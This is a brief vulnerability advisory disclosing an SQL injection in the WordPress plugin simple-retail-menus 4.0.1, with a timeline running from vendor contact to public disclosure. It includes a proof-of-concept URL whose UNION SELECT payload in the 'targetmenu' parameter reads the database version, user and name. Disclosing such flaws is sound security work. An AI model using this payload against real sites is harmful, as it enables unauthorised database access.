wp-plugin : simple-retail-menus | Code Vigilant : to err is human.. To fix is Humanity

Wp Plugin Simple Retail Menus

Plugin Details

Plugin Name: wp-plugin : simple-retail-menus

Effected Version : 4.0.1 (and most probably lower version's if any)

Vulnerability : Injection

Minimum Level of Access Required : Editor

CVE Number :

Identified by : Anantshri

WPScan Reference URL

Disclosure Timeline

December 25, 2013: Vendor Contacted
February 19, 2014 : Plugin Updated
May 28, 2014 : Public Disclosure

Technical Details

<http://localhost/wp-admin/admin.php?page=jsrm-retail-menus&mode=edit&targetmenu=2 union select @@version,2,user(),database(),5,6,7,8>

Vulnerable Parameter : targetmenu

Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=861170%40simple-retail-menus&old=728969%40simple-retail-menus&sfp_email=&sfph_mail=#file1